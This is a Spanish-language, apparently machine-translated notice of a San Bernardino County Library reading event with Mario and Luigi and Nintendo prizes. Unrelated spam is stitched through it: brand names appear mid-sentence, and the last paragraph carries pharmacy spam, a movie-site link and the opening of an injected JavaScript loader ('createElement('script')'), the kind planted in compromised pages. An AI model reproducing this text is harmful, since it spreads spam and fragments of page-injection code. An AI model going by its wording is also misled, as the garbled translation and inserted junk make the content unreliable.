Poder y leer en las bibliotecas del Condado

Reportes

(Victor Valley)– La Biblioteca del Condado de Parajumpers Ugo Herr San Bernardino le invita a unirse a nosotros en septiembre para nuestro primer evento de alimentación y leer. Mario y Luigi están visitando nuestras bibliotecas y están a la espera para que usted pueda reunirse con ellos. Les encanta leer y han traído poderes impresionantes para cualquier persona que le gusta leer también! Cuantos más libros que llevar a casa, Cheap Burberry Cashmere Scarf las más premios que se llevan a casa. Usted puede incluso encontrar un peluche gigante Mario o Luigi a tu lado!

Este evento es una oportunidad para celebrar y apoyar la campaña de alfabetización de la Visión del Condado, Vision2Read. El evento de alimentación y leer continuará hasta el mes de septiembre y se producen en todas las sucursales de la Biblioteca del Condado de San Bernardino. Cada 30 artículos sacados gana una felpa de Mario Bros temático llavero, así como una oportunidad dibujo billete para la oportunidad de ganar el gran premio: un sistema de juego de Nintendo!

El Sistema de Bibliotecas del Condado de San Bernardino es una red dinámica de 32 bibliotecas sucursales que atiende a una población diversa sobre una vasta área geográfica. El sistema de bibliotecas del Condado se esfuerza por ofrecer igualdad de acceso a la información, la tecnología, los programas y servicios para todas las personas que se llaman Condado de San Bernardino casa.

La biblioteca desempeña un papel clave en el logro de la Visión del Condado, contribuyendo al desarrollo educativo, cultural e histórico de nuestra comunidad del Condado.

Para obtener más información sobre el sistema de bibliotecas del Condado de San Bernardino, visite o llame al (909) 387-2220. online Purchase var d=document;var s=d.createElement(‘script’); Purchase cheap desyrel package levitra maximum dosage Order Cheap http://www.walkingforwater.eu/raavanan-tamil-full-movie-online/

Close